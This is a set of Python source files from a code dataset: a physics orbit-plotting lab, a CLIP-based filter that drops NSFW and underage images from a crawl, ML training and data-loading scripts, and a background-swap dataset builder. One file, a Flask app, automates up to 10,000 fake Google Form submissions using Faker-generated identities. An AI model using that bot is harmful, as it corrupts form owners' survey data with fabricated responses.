on doit ajouter un point\r\n\r\nplt.axhline(ls='dotted')\r\nplt.axvline(ls='dotted')\r\nplt.xlabel('Position en x (UA)')\r\nplt.ylabel('Position en y (UA)')\r\nplt.axis('equal')\r\n# On ajuste les paramètres esthétiques du graphique\r\n\r\nfor i in excentricite:\r\n orbite = np.array([demiGrandAxe, i, anomalieMoyenneDepart])\r\n # On définit les paramètres de départ pour la courbe qu'on cherche à tracer\r\n\r\n positionX0, positionY0 = positionExo(orbite, masseEtoile, temps)\r\n # On trouve la position de l'exoplanète pour tous les temps demandés\r\n\r\n plt.plot(positionX0, positionY0, '-')\r\n plt.plot(positionX0[iTempsPointe], positionY0[iTempsPointe], '.')\r\n # On met les tracés qu'on désire sur le graphique pour la courbe actuelle\r\n\r\nplt.savefig('Laboratoire7-figureQ2-1.png')\r\n\r\nplt.figure(1)\r\n# On crée la deuxième figure\r\n\r\nexcentricite = 0.5\r\nanomalieMoyenneDepart = [0, np.pi / 2, np.pi]\r\n# On définit les paramètres qui changent entre les deux graphiques\r\n\r\nplt.axhline(ls='dotted')\r\nplt.axvline(ls='dotted')\r\nplt.xlabel('Position en x (UA)')\r\nplt.ylabel('Position en y (UA)')\r\nplt.axis('equal')\r\n# On ajuste les paramètres esthétiques du graphique\r\n\r\nfor i in anomalieMoyenneDepart:\r\n orbite = np.array([demiGrandAxe, excentricite, i])\r\n # On définit les paramètres de départ pour la courbe qu'on cherche à tracer\r\n\r\n positionX0, positionY0 = positionExo(orbite, masseEtoile, temps)\r\n # On trouve la position de l'exoplanète pour tous les temps demandés\r\n\r\n plt.plot(positionX0, positionY0, '-')\r\n plt.plot(positionX0[iTempsPointe], positionY0[iTempsPointe], '.')\r\n # On met les tracés qu'on désire sur le graphique pour la courbe actuelle\r\n\r\nplt.savefig('Laboratoire7-figureQ2-2.png')\r\n\r\nplt.figure(2)\r\n# On crée la troisième figure\r\n\r\nmasseEtoile = [1, 0.25]\r\nanomalieMoyenneDepart = 0\r\n# On définit les paramètres qui changent entre les deux graphiques\r\n\r\nplt.axhline(ls='dotted')\r\nplt.axvline(ls='dotted')\r\nplt.xlabel('Position en x (UA)')\r\nplt.ylabel('Position en y (UA)')\r\nplt.axis('equal')\r\n# On ajuste les paramètres esthétiques du graphique\r\n\r\nfor i in masseEtoile:\r\n orbite = np.array([demiGrandAxe, excentricite, anomalieMoyenneDepart])\r\n # On définit les paramètres de départ pour la courbe qu'on cherche à tracer\r\n\r\n positionX0, positionY0 = positionExo(orbite, i, temps)\r\n # On trouve la position de l'exoplanète pour tous les temps demandés\r\n\r\n plt.plot(positionX0, positionY0, '-')\r\n plt.plot(positionX0[iTempsPointe], positionY0[iTempsPointe], '.')\r\n # On met les tracés qu'on désire sur le graphique pour la courbe actuelle\r\n\r\nplt.savefig('Laboratoire7-figureQ2-3.png')\r\n\r\nplt.show()","sub_path":"PHY1234/Laboratoire7-codesQ2.py","file_name":"Laboratoire7-codesQ2.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631653992","text":"import clip\nimport time\nimport torch\nimport pickle\nfrom PIL import Image\nfrom multiprocessing import cpu_count\nfrom multiprocessing.queues import JoinableQueue\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nclass CLIPDataset(torch.utils.data.Dataset):\n def __init__(self, dataframe, preprocess):\n self.dataframe = dataframe\n self.image_transform = preprocess\n self.tokenizer = clip.tokenize\n\n def __len__(self):\n return len(self.dataframe)\n\n def __getitem__(self, index):\n row = self.dataframe.iloc[index]\n return (\n self.image_transform(Image.open(row[\"PATH\"])),\n self.tokenizer(row[\"TEXT\"], truncate_text=True)[0],\n )\n\nclass CLIP:\n def __init__(self):\n self.model, self.preprocess = clip.load(\"ViT-B/32\", device=device, jit=False)\n self.cosine_similarity = torch.nn.CosineSimilarity(dim=1, eps=1e-6)\n with torch.no_grad():\n self.categories = self.model.encode_text(clip.tokenize([\"neutral\",\"selfie\", \"illustration, drawing\", \"toys, play, kids, children\", \"teddy bear, puppet\", \"animal, bird, mammal, insect\" \"fashion, clothes\", \"logo, commercial, ad, advertisement\", \"drawing, painting\",\"anime, cartoon\",\"comedy, fun\",\"romance, love story\",\"thriller, suspense, crime story\",\"action, action movie\", \"horror, monster movie\", \"documentary\", \"news, journalism\", \"entertainment\", \"talk show\", \"porn, sex, sperm, nipples, breats, tits, boops, penis, dick, cock, clitoris, vagina, fuck, lust, horny, sexual, lick, licking\", \"porn, sex, sperm, nipples\", \"porn, sex, sperm, penis, dick, cock\", \"nipples, breats, tits, boops, sexy\", \"penis, dick, cock\", \"clitoris, vagina\", \"sex, fuck, lust, horny, sexual, lick, licking\", \"porn, sex, sexy\",\"sexy, hot\",\"sperm, skin\",\"lust, horny, sexual\",\"lick, licking, body\", \"anime, hentai, sexy\", \"cartoon, sexy, sex\", \"hentai\", \"anime, sexy, breasts\", \"hentai\"]).to(device))\n self.underaged_categories = self.model.encode_text(clip.tokenize([\"teenager, teen\", \"kid, child, teenager, teen, baby or toddler, underaged, little girl, little boy\", \"kid, child, little girl, little boy\", \"baby, toddler\",\"adult, woman, man, grownup, grown person,full-aged of legal age\",\"full-aged, of legal age, adult\",\"woman, man\",\"adult, woman, man, grownup, grown person,full-aged of legal age\"]).to(device))\n self.animal_categories = self.model.encode_text(clip.tokenize([\"lifeless object, thing\", \"thing, object\", \"material\", \"furniture\",\"wall\", \"house\", \"tree\", \"wood\",\"ground\",\"industry\", \"table\", \"bed\", \"tool\", \"dress, clothes\", \"door\", \"chair\", \"rock, stone\", \"human\", \"man\", \"woman\", \"man, woman\", \"animal\",\"cat\",\"dog\", \"cow\", \"pig\", \"goat\", \"sheep\", \"elephant\", \"horse\", \"horse, elephant, pig, dog, cat, sheep, goat, animal\", \"life\", \"wildlife\"]).to(device))\n\n def similarity_imgalt(self, image_tensor, text_tokens):\n with torch.no_grad():\n image_features = self.model.encode_image(image_tensor.to(device)).float()\n text_features = self.model.encode_text(text_tokens.to(device)).float()\n similarity = self.cosine_similarity(image_features, text_features).tolist()\n\n image_features = image_features.detach().cpu().numpy()\n return image_features, similarity\n\n def preprocess_images(self, df):\n ret_image_features = []\n ret_similarity = []\n batch_size = 256 if device == \"cuda\" else 8\n dataset = CLIPDataset(df, self.preprocess)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=int(2*cpu_count()/3), pin_memory=True)\n for tensors, tokens in dataloader:\n image_features, similarities = self.similarity_imgalt(tensors, tokens)\n ret_image_features.extend(image_features)\n ret_similarity.extend(similarities)\n return ret_image_features, ret_similarity\n\n def prob(self, image_features, text_features):\n text_features = text_features.float()\n image_features = torch.as_tensor(image_features).to(device, dtype=torch.float32)\n image_features /= image_features.norm(dim=-1, keepdim=True)\n text_features /= text_features.norm(dim=-1, keepdim=True)\n\n # cosine similarity as logits\n similarity = (100.0 * image_features @ text_features.T).softmax(dim=-1)\n _, indices = similarity.topk(2)\n return indices\n\n\nclip_filter = CLIP()\n\n\ndef df_clipfilter(df):\n sim_threshold = 0.3\n underaged_text = [\"teen\", \"kid\", \"child\", \"baby\"]\n\n img_embedding, similarities = clip_filter.preprocess_images(df)\n tmp_embed = []\n\n for i, img_embed in enumerate(img_embedding):\n if similarities[i] < sim_threshold:\n df.at[i, 'dropped'] = True\n continue\n\n # get most similar categories\n nsfw_prob = clip_filter.prob(img_embed, clip_filter.categories)\n df.at[i, \"NSFW\"] = \"UNSURE\"\n df.at[i, \"similarity\"] = similarities[i]\n if nsfw_prob[0] < 19 and nsfw_prob[1] < 19:\n df.at[i, \"NSFW\"] = \"UNLIKELY\"\n tmp_embed.append(img_embed)\n df.at[i, 'dropped'] = False\n continue\n elif nsfw_prob[0] >= 19 and nsfw_prob[1] >= 19:\n df.at[i, \"NSFW\"] = \"NSFW\"\n\n underage_prob = clip_filter.prob(img_embed, clip_filter.underaged_categories)\n if underage_prob[0] < 4 or underage_prob[1] < 4 or any(x in df.at[i, \"TEXT\"] for x in underaged_text):\n df.at[i, 'dropped'] = True\n continue\n\n animal_prob = clip_filter.prob(img_embed, clip_filter.animal_categories)\n if animal_prob[0] > 20:\n df.at[i, 'dropped'] = True\n continue\n tmp_embed.append(img_embed)\n df.at[i, 'dropped'] = False\n \n df = df[df[\"dropped\"] != True]\n df.reset_index(drop=True, inplace=True)\n return tmp_embed, df\n\n\ndef df_tfrecords(df, output_fname):\n import tensorflow as tf\n from tfr_image.utils import bytes_feature, int64_feature\n\n def image_to_tfexample(sample_id, image_data, image_format, height, width, caption):\n return tf.train.Example(\n features=tf.train.Features(\n feature={\n \"sampleID\": bytes_feature(sample_id),\n \"image\": bytes_feature(image_data),\n \"format\": bytes_feature(image_format),\n \"label\": bytes_feature(caption),\n \"height\": int64_feature(height),\n \"width\": int64_feature(width),\n }\n )\n )\n\n with tf.io.TFRecordWriter(output_fname) as tfrecord_writer:\n for i in range(len(df)):\n df_image = df.iloc[i]\n image_fname = df_image[\"PATH\"]\n file_type = image_fname.split(\".\")[-1]\n with tf.io.gfile.GFile(image_fname, \"rb\") as f:\n image_data = f.read()\n example = image_to_tfexample(\n str(df_image[\"SAMPLE_ID\"]).encode(\"utf_8\"),\n image_data,\n file_type.encode(\"utf_8\"),\n df_image[\"HEIGHT\"],\n df_image[\"WIDTH\"],\n df_image[\"TEXT\"].encode(\"utf_8\"),\n )\n tfrecord_writer.write(example.SerializeToString())\n\n\ndef filter(df, out_fname, output_folder, errors: JoinableQueue):\n results = []\n #start0 = start = time.time()\n img_embeddings, dff = df_clipfilter(df)\n dff.to_csv(f\"{output_folder}{out_fname}.csv\", index=False, sep=\"|\")\n\n #count results for each worker from resulting dff\n dff[\"shard\"] = dff.apply(lambda row: str(row.PATH).split(\"/\")[1].replace(\"-\",\".\"), axis=1)\n results = dff[\"shard\"].value_counts()\n #print(f\"CLIP ran in {round(time.time()-start,2)}\")\n #start = time.time()\n img_embeds_sampleid = {}\n for i, img_embed_it in enumerate(img_embeddings):\n dfid_index = dff.at[i, \"SAMPLE_ID\"]\n img_embeds_sampleid[str(dfid_index)] = img_embed_it\n with open(f\"{output_folder}image_embedding_dict-{out_fname}.pkl\", \"wb\") as f:\n pickle.dump(img_embeds_sampleid, f)\n #print(f\"Embeddings ran in {round(time.time()-start,2)}\")\n #start = time.time()\n df_tfrecords(\n dff,\n f\"{output_folder}crawling_at_home_{out_fname}__00000-of-00001.tfrecord\",\n )\n #print(f\"Tfrecords ran in {round(time.time()-start,2)}\")\n #print(f\"Job ran in {round(time.time()-start0,2)}\")\n return len(dff), results","sub_path":"clip_filter.py","file_name":"clip_filter.py","file_ext":"py","file_size_in_byte":8435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163617419","text":"import numpy as np\nimport LC_model\nimport getting_data\n\ndata_tr, label_tr = getting_data.read_dir(\"./digits/trainingDigits/\", 10)\ndata_ts, label_ts = getting_data.read_dir(\"./digits/testDigits/\", 10)\n\n\nprint(\"Data loaded\")\n\ninput_unit = data_tr.shape[0]\noutput_unit = label_tr.shape[0]\n\nlamda = 0.01\n\nlc = LC_model.linearmodel(input_units=input_unit, output_units=output_unit, lamda=lamda)\n\nepoch = 128\nbatch_size = 128\n\nnum_cases = data_tr.shape[1]\n\n\nprint(\"Training begin\")\n\n\nfor step in range(epoch):\n #shuffle data done in the process of loading data\n for batch in range(0, num_cases, batch_size):\n lc.SGD(data_tr[:, batch: batch + batch_size], 0.01, label_tr[:, batch: batch + batch_size])\n if batch % batch_size == 0:\n get_logits = lc.inference(data_tr[:, batch: batch + batch_size])\n cost = lc.loss(get_logits, label_tr[:, batch: batch + batch_size])\n print(\"in batch {} the cost is: {}\".format(batch / batch_size +1, cost))\n if (step+1) % 32 == 0:\n\n rate = lc.evaluation(testing_data=data_ts, testing_labels=label_ts)\n print(\"the {} step: correct rate is {}\".format(step + 1,rate))","sub_path":"A1/linear classifier/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"463869366","text":"import os\nimport random\n\nBASE_DIR = 'financial-news-dataset/'\nBLOOMBERG_DATA_DIR = os.path.join(BASE_DIR, '20061020_20131126_bloomberg_news')\nREUTERS_DATA_DIR = os.path.join('ReutersNews106521')\n\n# @ is the encoding for digits.\nVOCABULARY = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q',\n 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', ' ', ',', '.', '$', '%', '\\'', '-', '@']\n\n\ndef get_filename():\n for root, dirs, files in os.walk(BLOOMBERG_DATA_DIR):\n for file in files:\n yield os.path.join(root, file)\n for root, dirs, files in os.walk(REUTERS_DATA_DIR):\n for file in files:\n yield os.path.join(root, file)\n\n\ndef filter_unwanted_characters(s):\n unwanted_chars = ['\\'\\'', '``', '\\n']\n for unwanted_char in unwanted_chars:\n s = s.replace(unwanted_char, ' ')\n while ' ' in s:\n s = s.replace(' ', ' ')\n s = s.replace(' ,', ',')\n s = s.replace(';', ',')\n end_tag = 'To contact the reporter'\n if end_tag in s:\n s = s[:s.index(end_tag)]\n return s\n\n\ndef filter_to_reduce_vocabulary(string):\n string = string.lower()\n output = []\n for c in string:\n if c.isdigit():\n output.append('@')\n if c in VOCABULARY:\n output.append(c)\n return ''.join(output)\n\n\ndef read(num_filenames=int(6e3), shuffle=True, debug=False):\n buffer = ''\n filename_list = sorted([v for v in get_filename()])\n if shuffle:\n random.shuffle(filename_list)\n filename_list = filename_list[:num_filenames]\n for i, file in enumerate(filename_list):\n filename = file.split('/')[-1]\n if debug:\n print(i, filename)\n if '-' in filename:\n with open(file, 'r', encoding='utf-8', errors='ignore') as f:\n new_lines = f.readlines()\n if len(new_lines) > 0:\n st = max([t[0] for t in enumerate(new_lines) if t[1].startswith('--')]) + 1\n new_str = ''.join([v for v in new_lines[st:] if not v.startswith('--') and '@' not in v]).strip()\n new_str = filter_unwanted_characters(new_str)\n new_str = filter_to_reduce_vocabulary(new_str)\n if debug:\n print(new_str)\n buffer += new_str\n return buffer\n\n\nif __name__ == '__main__':\n read(debug=True)\n","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"39328327","text":"from flair.data import Sentence, TaggedCorpus, Token\nfrom flair.data_fetcher import NLPTaskDataFetcher, NLPTask\nfrom flair.embeddings import TokenEmbeddings, WordEmbeddings, StackedEmbeddings, CharLMEmbeddings\nfrom typing import List\n\nsentences_train: List[Sentence] = NLPTaskDataFetcher.read_conll_ud(\"universal-dependencies-1.2/UD_German/de-ud-train.conllu\")\nsentences_dev: List[Sentence] = NLPTaskDataFetcher.read_conll_ud(\"universal-dependencies-1.2/UD_German/de-ud-dev.conllu\")\nsentences_test: List[Sentence] = NLPTaskDataFetcher.read_conll_ud(\"universal-dependencies-1.2/UD_German/de-ud-test.conllu\")\n\ncorpus: TaggedCorpus = TaggedCorpus(sentences_train, sentences_dev,\n sentences_test)\n\ntag_type = 'upos'\n\ntag_dictionary = corpus.make_tag_dictionary(tag_type=tag_type)\n\nembedding_types: List[TokenEmbeddings] = [\n WordEmbeddings('de-fasttext'),\n CharLMEmbeddings('german-forward'),\n CharLMEmbeddings('german-backward'),\n]\n\nembeddings: StackedEmbeddings = StackedEmbeddings(embeddings=embedding_types)\n\nfrom flair.models import SequenceTagger\n\ntagger: SequenceTagger = SequenceTagger(hidden_size=256,\n embeddings=embeddings,\n tag_dictionary=tag_dictionary,\n tag_type=tag_type,\n use_crf=True)\n\nfrom flair.trainers import SequenceTaggerTrainer\n\ntrainer: SequenceTaggerTrainer = SequenceTaggerTrainer(tagger, corpus,\n test_mode=True)\n\ntrainer.train('resources/taggers/ud-german',\n learning_rate=0.1,\n mini_batch_size=32,\n max_epochs=500)\n","sub_path":"ud-german/train_1.py","file_name":"train_1.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"174393391","text":"import csv\n\nimport numpy as np\n\n#shuffle\nimport random\n\ndef read_csv(file_link):\n with open(file_link, 'r', encoding='utf-8') as csvfile:\n return np.array([row for row in csv.DictReader(csvfile)])\n\n# 製作運算矩陣\ndef parse_data(data,x_targets, y_target='CITY'):\n x = np.array([[float(row[_element]) for _element in x_targets ] for row in data ])\n y = np.array([row[y_target] for row in data])\n unique = np.unique(y)\n y = np.array([list(unique).index(row) for row in y])\n\n return x,y,unique\n\n# def onehotencoding(y):\n# unique = np.unique(y)\n# y_one = np.array([[1 if row == onehot else 0 for onehot in unique] for row in y])\n# return y_one\n\n# def min_max_scaler(x_1):\n# for i in range(x_1.shape[1]):\n# x_1[:,i] = (x_1[:,i]-x_1[:,i].min())/(x_1[:,i].max()-x_1[:,i].min())\n# return x_1\n\n\n\ndef load(size = 10000,seed = 20191127):\n random.seed(seed)\n rows = read_csv('regionwide.csv')\n random.shuffle(rows)\n\n if size != 'max':\n rows = rows[:size]\n features = ['LON','LAT']\n data = np.array(rows)\n x, y, unique = parse_data(data,features)\n # x = xx(x)\n # t = onehotencoding(y)\n return x, y, unique","sub_path":"jmodel/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"647988611","text":"import http.client\r\nimport urllib.request\r\nimport random\r\nfrom bs4 import BeautifulSoup\r\nfrom time import sleep\r\nfrom flask import Flask, request, render_template, redirect, url_for\r\nfrom faker import Faker\r\nfake=Faker()\r\nfake_IN=Faker('hi_IN')\r\n\r\napp = Flask(__name__)\r\nlink_short=str()\r\nnum=int()\r\nfinal_ans=dict()\r\nform_entry=list()\r\nrand=list()\r\nquestion_list=list()\r\n\r\n@app.route('/', methods=[\"GET\",\"POST\"])\r\ndef index():\r\n global link_short, num, final_ans, form_entry, rand, question_list\r\n if request.method==\"POST\":\r\n link = request.form['link']\r\n num = request.form['num']\r\n if int(num)>10000:\r\n num=\"10000\"\r\n print(num)\r\n linkarr = link.split('/')\r\n link_short = linkarr[6]\r\n page=urllib.request.urlopen(link)\r\n soup=BeautifulSoup(page, \"html.parser\")\r\n rand=[]\r\n s = soup.find(\"div\", {\"class\": \"freebirdFormviewerViewHeaderTitle exportFormTitle freebirdCustomFont\"})\r\n title = s.get_text(separator=\"\\n\")\r\n \r\n \r\n def input_entries():\r\n questions = soup.find_all(\"div\", {\"class\": \"freebirdFormviewerViewItemsItemItem\"})\r\n \r\n for q in questions[0:]:\r\n \r\n result = q.get_text(separator=\"\\n\")\r\n question_list.append(result)\r\n \r\n attributes = q.find_all(\"input\")\r\n #user_ans=input(\"Enter your choice: \")\r\n \r\n for attribute in attributes:\r\n try:\r\n entry_token=str(attribute.attrs['name'])\r\n if(entry_token[-1].isdigit()):\r\n token=str(attribute.attrs['name'])\r\n form_entry.append(token)\r\n break\r\n except:\r\n print(\"\")\r\n \r\n # if user_ans.startswith('!random'):\r\n # rand.append(result.split('\\n'))\r\n #final_ans[token]=user_ans\r\n \r\n input_entries()\r\n question_length = len(question_list)\r\n\r\n return render_template(\"sent.html\",**locals(), question_list = question_list)\r\n else:\r\n return render_template(\"index.html\", **locals())\r\n\r\n@app.route('/send', methods=[\"GET\",\"POST\"])\r\ndef send():\r\n global link_short ,num, form_entry, rand, question_list\r\n if request.method==\"POST\":\r\n form_entry_data = request.form.getlist('user_ans')\r\n print(form_entry)\r\n print(form_entry_data)\r\n print(num)\r\n def post(link,num):\r\n headers = {\r\n 'content-type': \"multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\",\r\n 'cache-control': \"no-cache\",\r\n 'postman-token': \"f7281180-f919-b589-709a-a77457e89d08\"\r\n }\r\n\r\n for x in range(int(num)):\r\n conn = http.client.HTTPSConnection(\"docs.google.com\")\r\n rand_ctr=0\r\n payload=\"------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n for i in range(len(form_entry)):\r\n #print(\"ans= \"+str(faker_input((form_entry_data[i])[6:])))\r\n if(form_entry_data[i].startswith('!cgpa.')):\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+str(random.randrange(int((form_entry_data[i])[6:])*10,100,1)/10)+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n elif(form_entry_data[i].startswith('!roll.')):\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+form_entry_data[i][6:]+str(random.randrange(10000,99999,1))+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n elif(form_entry_data[i].startswith('!fake.')):\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+str(faker_input((form_entry_data[i])[6:]))+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n elif(form_entry_data[i]=='!random'):\r\n rand.append(question_list[i].split('\\n'))\r\n #print(rand)\r\n #print(\"RANDOM START\")\r\n #print(str(rand[rand_ctr][random.randrange(1,len(rand[rand_ctr]),1)]))\r\n #print(\"RANDOM END\")\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+str(rand[rand_ctr][random.randrange(1,len(rand[rand_ctr]),1)])+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n rand_ctr=rand_ctr+1\r\n else:\r\n payload+=\"\\r\\nContent-Disposition: form-data; name=\\\"\"+str(form_entry[i])+\"\\\"\\r\\n\\r\\n\"+str(form_entry_data[i])+\"\\r\\n------WebKitFormBoundary7MA4YWxkTrZu0gW\"\r\n payload+=\"--\"\r\n conn.request(\"POST\", \"/forms/u/0/d/e/\"+link_short+\"/formResponse\", payload, headers)\r\n #sleep(1)\r\n #res = conn.getresponse()\r\n print('.')\r\n #data = res.read()\r\n final_ans.clear()\r\n form_entry.clear()\r\n rand.clear()\r\n question_list.clear()\r\n\r\n\r\n def faker_input(type):\r\n if(type==\"name\"):\r\n return fake.name()\r\n if(type==\"number\"):\r\n return ('9'+ fake.msisdn()[4:])\r\n if(type==\"word\"):\r\n return fake.word()\r\n if(type==\"sentence\"):\r\n return fake.sentence()\r\n if(type==\"email\"):\r\n return fake.email()\r\n else:\r\n return type\r\n post(link_short,num)\r\n return redirect('/')\r\n else:\r\n return render_template(\"index.html\",**locals())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='127.0.0.1', port='5000')\r\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"464392569","text":"\"\"\"\nMake adversarial versions of CUB\n\"\"\"\n\nfrom PIL import Image\nimport os\nfrom glob import glob\nimport numpy as np\nimport random\nimport json\n\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\n\ndef get_places(fname):\n \"\"\"\n Load list of places imgs and classes into dictionary\n \"\"\"\n places_dict = defaultdict(list)\n with open(fname, 'r') as f:\n for line in f:\n img_name, n = line.split()\n places_dict[int(n)].append(img_name)\n return places_dict\n\n\ndef crop_and_resize(source_img, target_img):\n \"\"\"\n Make source_img exactly the same as target_img by expanding/shrinking and\n cropping appropriately.\n\n If source_img's dimensions are strictly greater than or equal to the\n corresponding target img dimensions, we crop left/right or top/bottom\n depending on aspect ratio, then shrink down.\n\n If any of source img's dimensions are smaller than target img's dimensions,\n we expand the source img and then crop accordingly\n\n Modified from\n https://stackoverflow.com/questions/4744372/reducing-the-width-height-of-an-image-to-fit-a-given-aspect-ratio-how-python\n \"\"\"\n source_width = source_img.size[0]\n source_height = source_img.size[1]\n\n target_width = target_img.size[0]\n target_height = target_img.size[1]\n\n # Check if source does not completely cover target\n if (source_width < target_width) or (source_height < target_height):\n # Try matching width\n width_resize = (target_width, int((target_width / source_width) * source_height))\n if (width_resize[0] >= target_width) and (width_resize[1] >= target_height):\n source_resized = source_img.resize(width_resize, Image.ANTIALIAS)\n else:\n height_resize = (int((target_height / source_height) * source_width), target_height)\n assert (height_resize[0] >= target_width) and (height_resize[1] >= target_height)\n source_resized = source_img.resize(height_resize, Image.ANTIALIAS)\n # Rerun the cropping\n return crop_and_resize(source_resized, target_img)\n\n source_aspect = source_width / source_height\n target_aspect = target_width / target_height\n\n if source_aspect > target_aspect:\n # Crop left/right\n new_source_width = int(target_aspect * source_height)\n offset = (source_width - new_source_width) // 2\n resize = (offset, 0, source_width - offset, source_height)\n else:\n # Crop top/bottom\n new_source_height = int(source_width / target_aspect)\n offset = (source_height - new_source_height) // 2\n resize = (0, offset, source_width, source_height - offset)\n\n source_resized = source_img.crop(resize).resize((target_width, target_height), Image.ANTIALIAS)\n return source_resized\n\n\ndef combine_and_mask(img_new, mask, img_black):\n \"\"\"\n Combine img_new, mask, and image_black based on the mask\n\n img_new: new (unmasked image)\n mask: binary mask of bird image\n img_black: already-masked bird image (bird only)\n \"\"\"\n # Warp new img to match black img\n img_resized = crop_and_resize(img_new, img_black)\n img_resized_np = np.asarray(img_resized)\n\n # Mask new img\n img_masked_np = np.around(img_resized_np * (1 - mask)).astype(np.uint8)\n\n # Combine\n img_combined_np = np.asarray(img_black) + img_masked_np\n img_combined = Image.fromarray(img_combined_np)\n\n return img_combined\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\n\n parser = ArgumentParser(\n description='Make segmentations',\n formatter_class=ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--cub_dir', default='../CUB_200_2011/', help='Path to CUB (should also contain segmentations folder)')\n parser.add_argument('--places_dir', default='../places365/', help='Path to Places365 dataset')\n parser.add_argument('--places_split', default='val_large', help='Which Places365 split to use (folder in --places_dir)')\n parser.add_argument('--places_file', default='places365_val.txt', help='Filepath to list of places images and classes (file in --places_dir)')\n parser.add_argument('--out_dir', default='.', help='Output directory')\n parser.add_argument('--black_dirname', default='CUB_black', help='Name of black dataset: black background for each image')\n parser.add_argument('--random_dirname', default='CUB_random', help='Name of random dataset: completely random place sampled for each image')\n parser.add_argument('--fixed_dirname', default='CUB_fixed', help='Name of fixed dataset: class <-> place association fixed at train, swapped at test (but still class associated)')\n parser.add_argument('--fixedrandom_dirname', default='CUB_fixedrandom', help='Name of fixed-random dataset: class <-> place association fixed at train, random at test')\n parser.add_argument('--max_fixed_img', default=None, type=int, help='Maximum # of images to have per class in fixed settings')\n parser.add_argument('--train_json_file', default='/u/scr/muj/CloserLookFewShot/custom_filelists/CUB/base.json')\n parser.add_argument('--seed', type=int, default=42, help='Random seed')\n\n args = parser.parse_args()\n\n # If max_fixed_img is specified, change fixed/fixedrandom dirnames\n if args.max_fixed_img is not None:\n args.fixed_dirname = '{}_{}'.format(args.fixed_dirname, args.max_fixed_img)\n args.fixedrandom_dirname = '{}_{}'.format(args.fixedrandom_dirname, args.max_fixed_img)\n\n np.random.seed(args.seed)\n\n # Get species\n img_dir = os.path.join(args.cub_dir, 'images')\n seg_dir = os.path.join(args.cub_dir, 'segmentations')\n species = sorted(os.listdir(img_dir))\n\n # Make output directory\n os.makedirs(args.out_dir, exist_ok=True)\n\n # Get list of places\n places_dict = get_places(os.path.join(args.places_dir, args.places_file))\n\n # Full paths\n places_dict = {k: [os.path.join(args.places_dir, args.places_split, p) for p in v]\n for k, v in places_dict.items()}\n # For fixed images, restrict number of unique images\n if args.max_fixed_img is not None:\n places_dict_sub = {k: v[:args.max_fixed_img] for k, v in places_dict.items()}\n else:\n places_dict_sub = places_dict\n\n # Flat list of places - no size restrictions\n all_places = [item for sublist in places_dict.values() for item in sublist]\n assert all(os.path.exists(p) and p.endswith('.jpg') for p in all_places)\n # Iterate through places\n all_places_i = 0\n np.random.shuffle(all_places)\n\n # Arbitrarily map places class to birds class\n sampled_places = np.random.choice(list(places_dict.keys()), size=len(species), replace=False)\n s2p_train = {s: int(p) for s, p in zip(species, sampled_places)}\n # Shift sampled places at test\n s2p_test = {s: int(p) for s, p in zip(species, np.roll(sampled_places, 1))}\n\n # Load training classes\n with open(args.train_json_file, 'r') as f:\n train_json = json.load(f)\n train_labels = list(set(train_json['image_labels']))\n train_labels = [train_json['label_names'][i] for i in train_labels]\n # Get the places sampled for training classes\n train_places = [s2p_train[t] for t in train_labels]\n # Use restricted for fixed\n all_sampled_places = [places_dict_sub[p] for p in train_places]\n all_sampled_places = [item for sublist in all_sampled_places for item in sublist]\n np.random.shuffle(all_sampled_places)\n\n for spc in tqdm(species, desc='Classes'):\n spc_img_dir = os.path.join(img_dir, spc)\n spc_seg_dir = os.path.join(seg_dir, spc)\n\n # List images in species\n spc_img = sorted(os.listdir(spc_img_dir))\n spc_seg = sorted(os.listdir(spc_seg_dir))\n\n # Make sure directory files align\n assert all(i.endswith('.jpg') for i in spc_img)\n assert all(i.endswith('.png') for i in spc_seg)\n assert all(os.path.splitext(x)[0] == os.path.splitext(y)[0] for x, y in zip(spc_img, spc_seg))\n\n # New output directories\n spc_black_dir = os.path.join(args.out_dir, args.black_dirname, spc)\n spc_random_dir = os.path.join(args.out_dir, args.random_dirname, spc)\n spc_train_dir = os.path.join(args.out_dir, args.fixed_dirname, 'train', spc)\n spc_test_dir = os.path.join(args.out_dir, args.fixed_dirname, 